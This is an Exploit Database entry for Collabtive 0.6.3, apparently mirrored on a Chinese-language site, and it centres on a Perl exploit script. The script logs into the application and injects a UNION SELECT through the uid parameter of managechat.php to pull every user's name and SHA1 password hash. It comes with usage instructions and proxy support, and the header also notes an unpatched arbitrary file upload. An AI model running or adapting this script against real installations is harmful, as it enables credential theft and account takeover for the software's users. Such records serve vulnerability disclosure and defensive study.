Collabtive 0.6.3 – Multiple Vulnerabilities

Exploit Database
124 阅读

作者： DNX

日期： 2010-06-12
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/13844/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

#!/usr/bin/perl

use LWP::UserAgent;

use HTTP::Request::Common qw(POST);

use HTTP::Cookies;

use Getopt::Long;

# \#'#/

# (-.-)

#------------------oOO---(_)---OOo-----------------

#|__ __ |

#|_____/ /_____ ______/ /_________ ______ |

#| / ___/ __/ __ <code>/ ___/ __ \/ / / / __ </code>/ ___/ |

#|(__) /_/ /_/ / // /_/ / /_/ / /_/ (__)|

#| /____/\__/\__,_/_//_.___/\__,_/\__, /____/ |

#| Security Research Division/____/ 2o1o|

#--------------------------------------------------

#| Collabtive v0.6.3 Multiple Vulnerabilities |

#--------------------------------------------------

# [!] Discovered by.: DNX

# [!] Homepage......: http://starbugs.host.sk

# [!] Vendor........: http://collabtive.o-dyn.de

# [!] Detected......: 04.06.2010

# [!] Reported......: 05.06.2010

# [!] Response......: xx.xx.2010

# [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.

# Das Projekt startete im November 2007. Es ist eine

# Open-Source-Software und stellt eine Alternative zu proprietären

# Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.

# Collabtive wird von einem professionellen Team entwickelt.

# [!] Requirements..: Account needed

# [!] Bug...........: $_GET['uid'] in managechat.php near line 64

# 12: $userto_id = getArrayVal($_GET, "uid");

# 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");

# The password is encoded with sha1.

# [!] Bug...........: The arbitrary file upload discovered by USH is still present.

# See http://www.milw0rm.com/exploits/7076 more details.

if(!$ARGV[5])

{

print "\n \\#'#/ ";

print "\n (-.-)";

print "\n ---------------oOO---(_)---OOo---------------";

print "\n |Collabtive v0.6.3 SQL Injection Exploit|";

print "\n | coded by DNX|";

print "\n ---------------------------------------------";

print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";

print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";

print "\n[!] Options:";

print "\n -user [text]Username";

print "\n -pass [text]Password";

print "\n -p [ip:port]Proxy support";

print "\n";

exit;

}

my %options = ();

GetOptions(\%options, "user=s", "pass=s", "p=s");

my $ua= LWP::UserAgent->new();

my $cookie= HTTP::Cookies->new();

my $host= $ARGV[0];

my $path= $ARGV[1];

my $target= "http://".$host.$path;

my $user= "";

my $pass= "";

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }

if($options{"user"}) { $user = $options{"user"}; }

if($options{"pass"}) { $pass = $options{"pass"}; }

print "[!] Exploiting...\n\n";

exploit();

print "\n[!] Done\n";

sub exploit

{

##############

# make login #

##############

my $url = $target."manageuser.php?action=login";

my $res = $ua->post($url, [username => $user, pass => $pass]);

$cookie->extract_cookies($res);

$ua->cookie_jar($cookie);

############################

# get users with passwords #

############################

$url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";

$res = $ua->get($url);

my $content = $res->content;

my @c = split(/<br \/>/, $content);

foreach (@c)

{

if($_ =~ /<b>(.*?):<\/b> (.*)/)

{

print $1.":".$2."\n";

}